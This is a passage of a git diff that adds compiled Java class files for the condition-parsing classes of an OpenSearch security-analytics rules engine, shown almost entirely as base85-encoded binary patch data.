z_|{^BUkvAfo}yfxVlt78TiqLNu050p z%0cNfghps?#x{kcdt#k-m1{`q9UHXPYUeF}uNtRA&UMU?-Y&s)WD%cw&25OqI(xcv zglAc1!<)t(=vacRkDe8~Dyu1d^D$)ZdMgrX2`BBE(n9%gk$j9MF6(&jh|@jax2u&N z?v!6$A-u0zAC1~^$2!}zmQV0rV#sv4wra?e3^dN%l_w~dFNS*M*I4{NgOQ&^sWiR|Z6n1sosbegj(^$nHBFr{+(QB13x7&wY^D<>8l z#mvfck78EkNzB=P4CfuiJQf$QSa}qSDxb%!K9p20I*KKSF*fsM$#WzZKo$RgpEFf0 zYnO5pE4iFHE?^a=@~zH!SdI7a@^d*Z!wRfp55A7U2DSmU?vn6cQqaE*-d44w%*k`w zlr74-4G!Z1PDxo-fMqP3+^##ajHUBgo`Ag5oQChv#Ncs(f8cX7;R-Gyor~Ecz*@D( zo)yZTyq~kJn4v>MW`CD>?AW-dAD8xH%?WJasK85!weGa++JRI3gP4EI*!CK^!DTC>Y~HguU+6*j8@5is|KsyVFPe z(YLs=+~~*0yszBvCj^I17ZVH$h)Yi3lX<+Bo!Q9B%sx!y&%8xTj^oqrfWs(Q^3viX zU@XVv&rn+Co%pW6PBYV>@$Qt+xDIcijoI3Eyp0gWYcu<`S!N(Ci}=i@3Y~Hx-^#2(m#kx6>vFzXQJn3^ z7?o`bXDs~@KIg3NV$v@m&Z_Vu9KmzM#|8Ky{uqBkbY05%p2txlZ9Tq*ejFnv!|ZV! zC#c5vrc0ksmtISk-oSjfAJ;UE>p#gaiq=V->m1Qp|CA+nu0P{kirXlHr!f}=4sKT( zd{|(RKh)gIP?T;nu#K$-t})PN@Qnaw&z}7bCL72g-|0OOd-!V3| zG%r98nX`vR<_63{FDh{pg?lqab_>nKt%TEUgwO2=;SOGJ?I)n_WRJU8y4wMSih)~9 z0fIqLffSM`IPQOx?HZJa$@o7^sH*HFiG$m4U2xa`?h-kk|Jfw8AgQI)j zJ1JAPACsw#83F}|v8cSjvqj13KzSfFcG@W%s4iSmUf3@)PRK0PaQ1WPd~3-Gnai`l z<4S!1t>tH;rKA?TEQ`59uej7*UyAOR0?(3puAVp31_Sp|+waE=JV?v?FgD>4isMl} zvU?ca=)+zd!b5!D@+2OkE*_$`JkIOpC-4d%g8Tqa^Oouv3E(ir@|2X}GmhAHI5v8G zN^CM7N8~+}(sF!X-b+o*<1CZpeQe8D`m#*UXXznKciIA+%ajXfAqqLe02Ush&y#@Xh~sn55|lgBV}u;m#68*TrK7!!nTwa&&X;s zz%Pz&GmYiwXLiq-p6}8&LuR`K=AS0o1L?lnPSY?ZSJ!2Xi>sxE>~MkWxH#&Lsyt9Y zs4hCff?7S07uxtahrg~bE%5j&atS>+kJ0?T-5Wer2cHl=J!j#PSEUDkOCoL1 z=BEsr>}gzl5(l=EB{P;Blf79CqYQ>|n&val44y!L9AjAnr~@1nVip-R;$hxUnbkBHh?M z$K<}3+)gRj-JgQZ{uFE;90Z$rYVz<)!sb_m&94cY-w-yxC2W4j@Zl|bytlDNBnuWh z(oESwraZ)5=q3vhC@Y}euSe8CY bU_9pi|8cgBXWQfQ33-Z4e_EcAPoek^c)CVt literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionAND.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionAND.class new file mode 100644 index 0000000000000000000000000000000000000000..c2a2e3c89f221c756023634e48c259b9b062897a GIT binary patch literal 1414 zcmeHHO>Yx15PeQIO%oQ{q-psmALZ6Yh&^)H5>$m$inMAEK{@p1ZrqJw>rHJhVt*Eg z3W)|9Y345Xb3{g+7x zsyJ5S_^fo=lFxKM5tik;B>zx~bTYWed1}Ty&BfruObcVEVK=F|SgIFZbs*&`2}V{+ zm4rQ7t`A;6n}{Z=So6`qI>YAfa7n`&U}*cOVZ~V;A9buUtVL3Zqx}3-=r{Z{6%-R? zF;B-_OXpvMo}Eg=@ahI1MXC)+G&XxDl+zFqC;3s)^+jm+*aCIg<5q^dOCDzr#pbBpvvC(RO4Ws~q*bJWLeIu*Qm ze7jrQe)b7>y0uHRy51!=KGJO!o3ytn#_e@%z()ryLbnLnxyr;{+#}CL+^3h=+!?@ssW-+zAo0x*vE1`-VOp4co`ivG4E4*l%U839yIgEqyAEe)T=vqI zvt4^Nu(*8noWiOn7;3pIx!91FkPPenF~A=z;d9ZeP&CGp=j247wIVHZ z3~Oa3Gt}^$EenY^C>3iWl{*sL_i36LcFG_oOblz=nts7RRJe(uLup&ekXaKO z+@b$6EHhIEnGx`?Vk^F4O%#UqKzu|mS`ca+X536z{iiahFG7YjZ^zeMlFiT%C@pF` z)wk*u&2BmL6(P&4uOz#muc(coST;5lem<4*iJjG!|#1+#drmEnfc znL6g;WSvS6!%$wKq`TxlP2lRRm|4Elr<{_oBVbwT`4pt@t*x8)`mhc;Ee z=)h8NZk~2qrAnms=}MQL7$V|d^dY4xUP=g01QhbU%=xUJiq@y*<-(Y#F#mc|ecJG{ zBF*RRU?kgUpz>8bT*ZcivdxfOa;cEdIhOBp-@prok5{jf`MK#WTB3znGVqFFIxd>l zLuvSHhA(m9y%C#eK>EX+tmyULc8S7mWekC@RQx^Z8Z#X=;a zM`h8gN33WNeR!bDVj~jqP-W4tN9<@20~pk0@ih`Lq_TLVM|{&D9%ERSg%g1=@kC|u z6eBu>h(tUi*91n@E-{AZWJhRc8OKXZ(8`@8J4N;l*%`94WZ#lakzF9WNcJ6S{sJBy BLE8WT literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionBaseVisitor.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionBaseVisitor.class new file mode 100644 index 0000000000000000000000000000000000000000..0e13419c4fd51f34290a0253018958f7223137c5 GIT binary patch literal 4204 zcmcha?NZY~6o%iW*hsA+iinEesDK|)L_vy3t@trhsUx+HqocD;R|tlL*=!lO5^qEQ z=!`$S058h%G;J}}q;^Q^kM`_t)Az}F_oRFJ-g@z16a?Z3(HP4V38!s{R=A4R1A%T5qXxPip zpEqr>R9!C%S>$C)FdWJ|2DeIFnzeaju~)5{F2kez?r+KGN`_&mm9o9jB<15l%oU57 zdE%rtYa6kwxKs?rSOjrzi{z*$MO&@JmdcFh*Z3yaEpD&qh4Pv(6e0VT%@v!gsw6Xu zu@fn;6c~=CF^ppj`@Q^ftEN?v!e*GM1B0vWIaTZu6+rNPCk(a4P>9(gh5_#u3vzL5 zLkicWM}=W624DP&Z8zj~w_vmv45jFX1!cl8;`#QZB5YNV%fh1S@>^JqA*&Gawr;-v z4_wb!9^Ke~mgaw)OK(*Jz%LFQdB{m`l^UC8wn-I=z-j`n4zDh=__taUBND9?Hy z=Ib-A)lO%Ik8{P@zYpqp@7973%CNSq-c>}%sZ?(Zo83wJiERs+v$*RDSHmra7rSq; z8VyR&)2d;bVIitCm2I&2EW^8~;-l?5mD$_t7j%kx|?; z@fE4hG)N##?@4cQ0Q+g2u3vxy=%?AimX!gT(K&^~=)oY3dvL^)&C{rd=E;f6UoiBE zMt_Hqg>i+cjOFlolM)hSZfJxqwLI2Of|%o2fHpvukF@ zRrAVk;Duj+#1lvqsy-liS!m(WHivq?1f1f?->K^2qB(?h2IeTLOV<=Rx=|4B{~91sg`Iq}Srhhn7;{W+x|&+3Rx~ z8>+V(Zqg*gOh42zF#^}~VhoImv!Jcaj?@I0C0Y`ifo2|0Uj}12Z_pI=twyc9@#)qB z8JW@c??}T3mdQb^SS6NKqRfiGz1s6y=jE6bxZV{gt)<(tf>&|eLsj5}E2LGCT@=T| zEHWPpI6*b#Zr|*6RK|)_YxQ9w&eyKBDk$QVk2#zsPHp|m$@lf{ECgQjQO1n5&ie3h zMBrFQCGyk3?v~V>;a1F2RXb@E#@$dW`#f4KnH`l0bo1_ZN<|Jo50v<5Kh4bNI*oWj z1b(dL<(Xc&tTk4r&s=d^^}LWTmU;yj@s@{60@re$wDD8o<1%XOgIL~YS=Yzg>qXNZ zhi!Ri2(0EzXu5{B`|akMKHj!DmbL2b7~495k6Ba%D%<-fg(bV4SKjGt8GB%Skd1aP zFt=gC=<9o7-!-C#>-i_=Axs`_2+aRCGlx_HM|#q@9u-*FKVQ!dRqNqKxxh#C$SLpS z!58@Mf7ae^(6OHFN0IE?$(MP!CD6{fL3t21{Qo%k2W)Gd>Iyq%)yH{UAj3vF(2=~W z?3}3`_#HkOuG%s&R&ct3zk(fKvQ6xCtBs%NQG{i!&>uL<@3}Fyr31Dlyn}a%O+;q) z9=)$Q|H2m@#6J|F$h(L4J$!(IGcVHnCO#bH6Yy@M%Z*>KXlVp<+^f~ZYg}pmirbSw!U0(s1U})lfVF=C DNrc8e literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionIdentifier.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionIdentifier.class new file mode 100644 index 0000000000000000000000000000000000000000..86e8843e2f1a8239c6d5dbe65622668d4d4138ca GIT binary patch literal 3963 zcmeHKTUQfT6#h<xb1C|*LM)F8H4tk{c($srsWX2Q&gg*ps(#(6_<9c*604CKD4X*OePl~bWLTgKJ|e)=j`nBoqgY%-~W2?D}eL()qoRakQd6pq5o9{97l^*g(JZp2OlATtbbSgQ99T%k| z)fmIx;rh=tCGD(6$faipa9UOzu4~dkb#%+Iw+ci;Gsd~cq$+6o(-3T?7+w7mQ+*sg-MBXinB;wd( zq6d8p`-UfGH~Xs_46mDb4LkI1zX=0fJvfK~1N{uU0{1ulYvK*O$q=sy3Kqgkw>>{K z_fS|WXW%fynOAUf5{Hn|4;&?dhC3p^#jty0JZhO*ajUj8C%ij+&K5d; zU5nc@+>`no5)*1c`V7TwxVM#)ln)6?D8k#l(YR#J_0O+XLlIbQ18?L|{XZ=_BwN(9 zVCbp3zPjzX7Ud$tWtGOPG;fjIF#M>%S^n;13xJG^^SrwO#e^adL zO0~I8rDrw7xGp#ah7+AQHeWJuo#9eMcXU=Ui6SOUoW=(X-$gckXRK|-U%iqvdSxz& z5^fooWH=X5zx4nnrf{2P1L>EidWw~rq zn=0WG6ZbS@H!-%TsXiK_J~iLo3Alk-ri%n6Uku0J0BHj zy$f@U4ZPaT$n9&Z5)$><4)_17NsB7YwBptx6`633NKU&o&k{wcCyj#?jrGaBH5;7P zrHKZEYp$z&8kPT2%TL0;sRa=ld@{S@Qhx7VnU zyAF7RJCsEJV99kCYt{Cq6vlO1C0lp#4oxH-*zdRThmqQzOd&*`+x9dCT&{Nq+%7y~ z7;4t+)DRm=Ij%~T#XQYq<&<=2+i05%=7i%2FK=_-7rp_i(Z@GgqLXe0zGgW5&#aVk zbwl7NwY)ghk2qp_z@=SGkGH`}17omKuYgJPoxy1rdTIRz38DZeGKs{?|ynke+?WU%!Am2ejLXDh5~AUh+(AZMA*n+ zgycI(dz02W(oeQ4L2?%`V(uo`2@T4`XSx@0f+VWPDr{Nka{#}mbO3sg3)^#_XX|)&+x@> zff!o7fxv`^$bd&kxfCgKl!QBm2N(=gJX;sAsp2x`Uj zBq`M}K%MfCD2w#gUL^j+xPhX9Qr~q0@jr+dhfUuYmf+CZMbL`=YWR{)dc0Y|SLD0? FzX5o|=#T&a literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionItem.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionItem.class new file mode 100644 index 0000000000000000000000000000000000000000..eaf1a2715311d5175b98d2c5e4acd6c55b776dfa GIT binary patch literal 5507 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 literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionListener.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionListener.class new file mode 100644 index 0000000000000000000000000000000000000000..7132eca01c8de2b6c988540ac1532d97ef018e9a GIT binary patch literal 1955 zcmb_d+iuf95ItLcKiJ3PS)FrsJmdZO>-!G?k8nT0oWQeG@5*$al%Y^ZU!|dFsAGE= zsxUdUab%<(CS+ukszGeyRLRZp({^kuDbfLs3pDn^gHR@++LgU8dlcCK^8)J`d#G%p z<-tQ{Qa1iZ(rP04I@E@C_-RZdut3U^?%PmXfj6t$|8LEa>#n0>zm`V!@!C6q8jWI` z3pAZtPd^{+YchtnCh(yGQJ>M*Ze-eiQefFx*cveObe|F~o9|{&ftw@9ePc_Ru_M+A zEIN-*)xdZ5u>xlWO5aa2^Ha!M@n)Vdn+a literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionNOT.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionNOT.class new file mode 100644 index 0000000000000000000000000000000000000000..d17889c93d229026493f2fb327ef59f32fcd4f5e GIT binary patch literal 1414 zcmeH{OK%e~5Xb*cmZk{{ZPK(n%A?#$h1es9EkP(srAVvhkSd4X+>O~7w%*_eVm}rK zgv5alz=uMN(}E!6u+S^AWY3Ie#v{*9^Yz>3F94oluYnrF^Fn7)F&D}RuG3j$MC!D( zC09HztxQd%T`o+N7HTT3EL7D0AsvrS8VDGA|DIxK#W}+|*IB=C$}+GasZ@^Uw$P-W zGOQg+C2fzPyMLOz=I?mqtjwcC8XG^JFf_+9Q`|Z&7%Ts9IZP^6=aZUfAni=(zYKb* z%8?SISCzw7e5U`2xN5B{;*X@rr-QeS=VrolCkF55S{OqOyGqvORK573136b&G`3o* zEbh_reF*x+RJ2gXMu;Xh8MgO_D;m}WLnp*Fta+&$qJedWjYKMO?9R`GKH+D%AfKd2 zc|PG)o*^on@S~)g%WyI5{9Z#jzpR6~CEv=O|4-Qp zcB@jx&>9y`r{YL@LfXGhqNjc`;1MBJr|DLsMT9LR;)_n2B}8S5?AI685I5*l2p0aG zgJAc`C)_*;KBDcntq*it$2RR9@&UGp(=I}?w6Q}A*t>|tE!-x}``w|J*h0FCU3%#r R$>C4SeX=k-AX^O&zXO%n#g_m8 literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionOR.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionOR.class new file mode 100644 index 0000000000000000000000000000000000000000..63dcf57f8f1f893a21222cf0428818cf015afb3d GIT binary patch literal 1411 zcmeH{&2G~`5Xb+UI874_P1Ce|l#g<2BZQ9}97RG=Dn+u0)Sw)C+d7N0;O?gDU4$Qt zLxseF2jHO)eyu1ilh>+-1(U>ulZRj$S2Y< zPp90-Lccb8b}lm_?got-pM=DW)$fEV5Td$?KFZlzWs70&_Y(5Obs5a9_?900f5_IL zTNW~g=0rOai(^>;()wi&JumhGo)S=1T5T0N#Me?Hy6C1&LQFQversv(T2X2JsHK_^?3P+>ZDJ_JV$nb=q%h;%vK(Q{vYXl6Fz{3Q zFX|1BUO4qq$I%&`(HZ++IzH!Qp$VatLb*uJ+4J$d&+~rm{`%y{p8#CNQWhzJdqKEr z1$F61(hi+9E0RtlbmMK?x4rGybs{Tlcrvn_z+Z7=H}I{g-Pv6`jAS@6>95?{s)sU) zxXaC0ZpB$-1m=$o-GM8R@#MF$K&|@n!Ak<&^h9XKK`3xmTd@7u3$4v7^nxF|8`7!; z>(b}RQ=z-MMj|=6r(M9z7pnK|P1|b3u4h%zuCSOx8Xp)KL7p1(>X|AH6mfyHouIxw9R?fRa^fu(f@E(9m4gH> zH3=Q;3GK-meWEHz`Z6pP7PGh{aP#OzzYEn13zrRige%NrO{gv11ipC*u4;o!>Wv!c z6E9ID@Zob(q0<2ZeG9Setk2r@q~5yamaFSoDY|Z;q!bOR#Ww3q0^4z9ovrG|p?tpR zMlKuRZYR*a;m-1X>8M^dTdrMi=^4p-&cW_scJUlf;;B$AzE~I&#`oHGg{Fm%~N%suVD0 ze3rO={m3Yb1t#jzQ=-{~X{#*-k`iQnbhLlgs9`D>E&N=nscLh1g~L;PYULB{;TT~ zG??Pp%j;)$@Wvyg_e1=qA%>dA5(r+vS-eFMfw%Ea0yeJMD=rywd3Qh1?+0=j!G+{{ zg(ei2-01gsf3&!R!gqX1;i;NGTBzjqsN^uF)v~YQVuH1hV420AVLd=!@e!=iA26PR z!c1$-oVNBSzfk^a!8P}AO?-?`h<8=r5QCgv`#%Gpb{hDb2L3s$figZLt7d>JIzk(X zl3^;Dcz}K?nV^!%6do2i-r`7pnHEL=!o=eigTs4@hVd1ulrhU2&74pxb5Avzbj=-Z arf?Tub2K^Q$24l_;m$nnaa`2<^Zx;tQ&f`x literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionParser$ExpressionContext.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionParser$ExpressionContext.class new file mode 100644 index 0000000000000000000000000000000000000000..503aaf049d8cc05f09654e57fec13ce8db0c6bc5 GIT binary patch literal 1100 zcmb_bO>Yx15PeQI*>*`Oh0yX*AcYFGNyT1}I22V#5fzc53bj>wb~jdP*w~TnM9HrJ zgy2_j;S`AjKY$;F81IG_!6g#C%#6qL-pupP{`mRrJAh}{3{hY>)TS5fflyX(lbpp? zBts+Jge#s-oJ?$NhN-Y|qE%Nqsa4$k9lhqp3bXlgJTSsqx}qB=#x6v_@YwTmS7L-qs0EJKRWro+Sf!CN0Bp*6ebH?~`VVWs(-D{lQ(?CNoz|fVVWtoR@e|53@`q7DH&G&Sxb7a17Y1OZ5=j11JYjr z1QgNwkPYe7qO8w{^~U-X3tuTLAR-%)2i{TPdt9NYmY1P|B{~rRSFubaKDve#s;2eB zjT!9@d4E?3zIdB4`j)_ljIEO2&e;4wRm%8*V)DMORG;GJ#W*?m;~(JCId~1XX5c+) y<;O198&llAK<8pUQJc>h!)ji2E~boilI36M9-#}kj|b$VY?K-vViAwBeC-#Ku@Qs- literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionParser$IdentOrSelectExpressionContext.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionParser$IdentOrSelectExpressionContext.class new file mode 100644 index 0000000000000000000000000000000000000000..86066b879b73f68fd2a6856d75f1636b41cf7c16 GIT binary patch literal 2559 zcmcgtZBrXn6n<`k1j5pmSW&Umx2hp&*^1TH2Gi0sjG0NnAv^fdSvGgzwwv9|-5Ume zO8-S2wOU7=_Nzb2@!8FSXp#!l`epCSp8K5hob%jsfB)m>-vC_4Y7QBJZ$iCohg}&& z($(IM9Z9dJmDzU#*WWkFi)`KVWn_C{&{jr;fn7V8edX#%>PwBb49vQ2Nnd)VzSq?< zifBhOBlk=WV*(p5>|_8}V4_uT)@#oChCr#f(2QNUf$_DydyO#%Ms=iZw3N0Zbw`oT zTG*Bqfw3CLJOm~!K(6&VTT(mjmM;Yg&CqlGO;@XU zooO6p&!aUxw@GjmHxR3-i;#LT>|AShL08g(Rc`^Nd%2MFUbMD4qQUs=3#`PZD zbGxa0C*+3%f0xPGlej4@^7V)u#C49o-@5WR{ z=B4*P6n`*3Q}`6ubNGyna&(tGR6@$i!VP>*F(ia)JIZhCxI^A}Uan)2BwcoBA#({- zsM%(ZqsTN4Dq!~SO?AI}&{&sFfRompEwUB%v?o_p+%eAo<27511t?%O0yc=6??#b~ za=1ewpI#>YcT!+xpoI!t93hqTD)Sz%$;f;eMuyFWos=&(FwWU4$v4N<5_bj1iPE|8 z>|;zk;yeQ@wFADxH0M^|24`@VD}i&v&gX`m|9T`>)blhGV|;BVH|)A7l1g zu8v0VLxM2dw@M?RJ>J9|G1yCRA;oH?ScUR4%s<3*`6=d0Pw;jIF=jSll}~Vf;;ZxI z2yWpJw}AI?iFh9*C&Ub=AO4$zj|Lt5LI=Md*FgzoMs+#ieI?0CCuK56CW{YohD;X8 z9jwE ze*s@`^n-(6{S%JkjLztc{sYJNoNPnV0QLf3_S~QMeV+G{{QU0^KLWUfuPtO4?#6P} zjXOL_xG#e>H{n573bo}&ez>JXkhroN^280|XhkRyM{aF<_KhzSE>ARLbz`$5d6Lj6 z9V))5EQ~SSIWY7HELqxpUZ7*}_`O6_^a2j#ohb>l|FGID^xbJWHZsN0NA zQJ^*%yjS4^r5mSOkeWEdnI6w)=c`f3qs(oHMDd8rO0i|(Lx$`7ub^$HJm&C`jgRpO z<*IRLs9qVqeF+g5f=qLSIFQs~%823A3kr5r0EVe0N$-2ya!rE2DQ7_F|-3 z_PokMrAS{3=NYc;KfbBkdCcRYP2K!5g?B?!*`dbzD+}+a7I|Dj)dJ~OdVX{6$2w(T z<1}S)bz{E#B3*S&ndbh?pjiegmek#MlXIyb5H_w#dmz)53F zJ$fnb%7E8}uK!~@el<_)?#W;;MpW*mfAYk_mz1>oPl;ZmrJ@*Vh-7~#E&6SIqRA6= zGfosfpaz+x{{_G}%?_EbMXR&4%V@Mp?DQJ&3#Mpp_pV?XhiS!d1V`zs zpI=Cy=SxnO-aAi_-3jsQ07SkIF@xhN!~z-25LB-89o{IFALFe@v>J5cH-j+KyOko) zeY}hJ2!r8$!%n-ilwvvMpD_0TQ{^X^D}9d>8EDL`A(k^ZzY~Q&25_A|u7d)KgjzB$ zm}Xl3KLaO64g5(4{@Sep7iY+;vxfIMBWycmGD}S6A7Gl8%oCFf89Xf0_$iHadu)Kw z-*E8HfWg^5qgi~8t3=}(z37Ef?_7V%(IIJS#`qVwL8C*)v#8@HCh1Zgi!^>^&g=gH DUEKKy literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionParser$OrExpressionContext.class b/bin/main/org/opensearch/securityanalytics/rules/condition/ConditionParser$OrExpressionContext.class new file mode 100644 index 0000000000000000000000000000000000000000..aed6a3974a4807edf2ee6fef5441de5930fbb1e4 GIT binary patch literal 3011 zcmcImT~ixX7=BIyEF=q*w4&1bQA;%;*e$i%+QiT{78?yvLrllZWjTgJH@lg$8wP$# zFPw37MrU+J>kUr5aO$l;%JDrXOBz^ODU^%koIM}U`#kU0?mz$j`4@m|xNjiAQ1@li z^4r`CxGkM^E8tE?ig4TZY=cedJ+2LWx; zUdXpX0|N}TVypX_NHxhLg89f5rlMdWJNSRJM2i#upT>5JP9EsGCNTA*LVsH zr%X&B!!X|DVU0o=g(zUSknOT{ZLevST{{R02k;-S3Xd;!TB}^v?NyglWU9VnyA4|k z^&Bk@gzJJZ8^_mkKt7S4``JqF_}Hv0T*p`!3a 